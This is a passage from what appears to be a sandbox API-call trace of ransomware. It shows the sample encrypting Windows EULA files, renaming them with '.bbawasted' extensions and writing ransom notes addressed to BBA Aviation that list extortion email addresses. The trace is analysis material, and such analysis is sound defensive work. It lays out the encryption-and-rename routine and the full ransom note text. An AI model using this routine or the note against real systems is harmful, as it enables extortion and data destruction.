lpMem=0x6c13c8 | out: hHeap=0x660000) returned 1 [0237.395] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0237.396] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0237.396] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0237.396] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm") returned 56 [0237.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0237.396] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.396] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0237.397] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.397] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0237.397] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0237.409] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.411] SetEndOfFile (hFile=0x290) returned 1 [0237.411] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.411] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm.bbawasted")) returned 1 [0237.412] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0237.412] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0237.413] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x13f94 [0237.413] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13f94) returned 0x5f0000 [0237.413] CloseHandle (hObject=0x280) returned 1 [0237.417] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.418] CloseHandle (hObject=0x27c) returned 1 [0237.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aabf8 [0237.418] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0237.419] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x6aac40 | out: pbBuffer=0x6aac40) returned 1 [0237.419] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0237.419] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a64e8) returned 1 [0237.420] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0237.420] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0237.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x660000) returned 1 [0237.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.431] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EnDqcqb8vzSOeu5Txh4dnUxyEI9kEtLXMkjKCd5MNoiattPzYqOp6GVFsSErfq6u\r\nLp45jMnLWbl6KmR6OHLzsBog2tvb50vZineIKbW8D/EwJgF8V8aIbERFT4ZgwI17\r\ntrKQSsM0EtVrMbcToUDzlJdKS885aHOi7XcmDHV28ApLxjjEl2n/4ObOMSh6IXHB\r\nKTLn0v2K5mYicVlQ7P2g4JPRI5+O0cCrmenhzx6NDQQXgdyQTAIF2vUubKbPFRFq\r\n0kAYawHSzHFUPYtQ6azYoVW2MrIUW34i+RxqRRNniZiv9H2ui0+9lC5wH2V7gzC+\r\nFlq/XuzGcjp0U8NVWWCUa6q8ErtvOkcUIn6gRFhQggdS/Y1QRJo5PcoiJq3hCWdo\r\nAUUTvbgHVNunhu5z10FTiwdWQa9QYbQp2DMWEeH0BmS2+3P9iQE9Xe0Cej9ubFVL\r\nh+Rw9mOa1bzA3ihzP62tX++f2ECpuPT0THL5ylWbFOeQYSYb1/qwoIU2VTM8xUha\r\nNGxr5qB8TY6o0cjyxe2Y8rgj32AHkJIZGLRLRhPl1u94lQMzGcsm7pQlnNzi5Zer\r\nAGVsy2TRiQDCgwTKcHtYDH80ZKIWLGHYoY3+Q3qs3uTItu/JF3KAD7SLo20jqcG4\r\nH4ZItyUZKlRDY4ylrvhquERwqR/9mztvzIqSq6zUr1T=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.431] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0237.431] SetEndOfFile (hFile=0x290) returned 1 [0237.538] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.538] CloseHandle (hObject=0x290) returned 1 [0237.538] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0237.538] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2198 | out: hHeap=0x660000) returned 1 [0237.539] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0237.539] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0237.540] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0237.540] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm") returned 56 [0237.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0237.540] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.540] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6a38) returned 1 [0237.541] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.541] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0237.541] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0237.542] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.543] SetEndOfFile (hFile=0x290) returned 1 [0237.543] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.543] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm.bbawasted")) returned 1 [0237.544] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0237.545] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0237.545] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1158e [0237.545] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1158e) returned 0x610000 [0237.545] CloseHandle (hObject=0x27c) returned 1 [0237.548] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0237.549] CloseHandle (hObject=0x294) returned 1 [0237.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0237.550] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0237.550] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0237.550] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0237.550] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f10) returned 1 [0237.551] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0237.551] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0237.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0237.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.563] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Tt9+w7GT8/WJWgy1umn0zTGgowkImDaCKE14sBA+LUcigpeVDyX1jVtR0Dd8JoYg\r\n8zQSQeqWTm4s/9w1mROzvFVFEKQeg9j+qq7XpdBz6k7TohleSiH5MOh35LtBFJK0\r\n7wV1v4LGhD6facOyhVEJVcxCj/QQaAV157+8+hSG4dQBa0EbPjhYZYnFWahzoNbx\r\nezCZH1U5wcCbo4CKJmpr99T9dog8IpPBCACoz+emT6wuDjk1z2EqOAHZvY3muiWT\r\npB4t2TTcdzkk9VqQUagK85DvwZeOuBFJij32yHqi33/U7RPwOnuhP1y0T5tINF7E\r\nKF30ptOfrDNNRE8Ch75Hwgh1DVddCYRcAzZlp4suSBhCJXfURmKmXFy5MquSVpIh\r\nnCfDEGjFciRLcGbaZIQeJdN5U4EdMtD4FKIFpmRjbLFhzBl1e6afB3GrbJyJgzye\r\njO4iVUy2A7SL6agB6X6DE37pMAe5cD3K2oVHnkkz6Hx7hv21kr+SEaPqem+ww8o9\r\nRU+elxhUUd2/syNnfPTHvUsJpq8B02PzOSmoncU0alQEkDHvBhhFybCmiNc84a4/\r\nrAtRBzSanQUxXbfM3Jy/xj1sGVKMAQPe/de/ruXU6SyNvEk6LcPrP4fhAgdj9rKI\r\nBU7gBbkjUM+f151ae/c1SnSLNhgkUz3oavY1CiHcK4X=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.563] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0237.564] SetEndOfFile (hFile=0x290) returned 1 [0237.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.566] CloseHandle (hObject=0x290) returned 1 [0237.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0237.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0fb8 | out: hHeap=0x660000) returned 1 [0237.567] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a63d8) returned 1 [0237.567] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0237.567] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0237.568] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm") returned 56 [0237.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0237.568] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.568] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0237.568] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.568] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0237.569] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0237.569] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.571] SetEndOfFile (hFile=0x290) returned 1 [0237.571] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.571] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm.bbawasted")) returned 1 [0237.729] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0237.729] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0237.730] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x13160 [0237.730] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13160) returned 0x5f0000 [0237.730] CloseHandle (hObject=0x28c) returned 1 [0237.736] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.737] CloseHandle (hObject=0x27c) returned 1 [0237.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0237.737] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6460) returned 1 [0237.738] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0237.738] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0237.738] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a62c8) returned 1 [0237.738] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0237.738] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.749] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.749] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kIvsi1SW1BK3d9jjA9LJ9WgK63erNns11rqhIa8KI+ohlrxVql+j/VMkYZ+cX8qy\r\nt48EMPBfoQSRbCrcQdLWrkIg75mIPc9tTUrikD5v6lKs50v80jdyYOuIOJTvViLn\r\nI3XniYVqeN0+9edqOHAdjIKAu/f+5/vwXAvDmItKgBe6RQBLPY42QhaPx+RV6Dc1\r\n0I9TPRhaEz6GvH1IjqT5XDKIfpx50TiMxCNqiq4uiiLrxno9LK/8xIF91i73FI2f\r\ntX5uVepDE2U/9tKNvAfGLxWMs+x+AorfD33bX0+JCYHKC+2RtK9KMnLXF5z4DSCo\r\nIdoKzO6YkAkDo4XbRw7ztXCAq0V63zDokqwPY8LnHndDldg+Z0nSKaMmBOQmfQ2/\r\nELhBWBiujGa0XkY/JxVNnFRb5z1tACBbnQZmthCgNqAh6Ip11mKeNvZLmXaOA50v\r\nhtpNEcWXFCwLQDDyEGWl39pvhitWvrUtu7cyEf0XBLBLFMIsMFCKQMR0GYSOa1Vj\r\nKvtW/frIfibGgAeEVCh+1yll1eMkxib1JFeDY8aJ20nEJ8vpSftdFwks1e0scmvt\r\nT9sbtviY85HNqVjjdXtMZnwuoCmLtjSh6bbYI8wn5x2PkcinPpIHDkyM67oRd2NK\r\nz4X3VqnCPuhTnXpVvet5D8ybFysCS3SGdCaRNQ/tYV/=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.750] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.750] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0237.750] SetEndOfFile (hFile=0x290) returned 1 [0237.752] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.752] CloseHandle (hObject=0x290) returned 1 [0237.752] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0237.752] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2338 | out: hHeap=0x660000) returned 1 [0237.752] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0237.753] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0237.753] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0237.753] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm") returned 56 [0237.753] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0237.753] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.753] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.753] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0237.754] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.754] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0237.754] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0237.760] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0237.763] SetEndOfFile (hFile=0x290) returned 1 [0237.764] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.764] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.764] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0237.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm.bbawasted" (normalized: 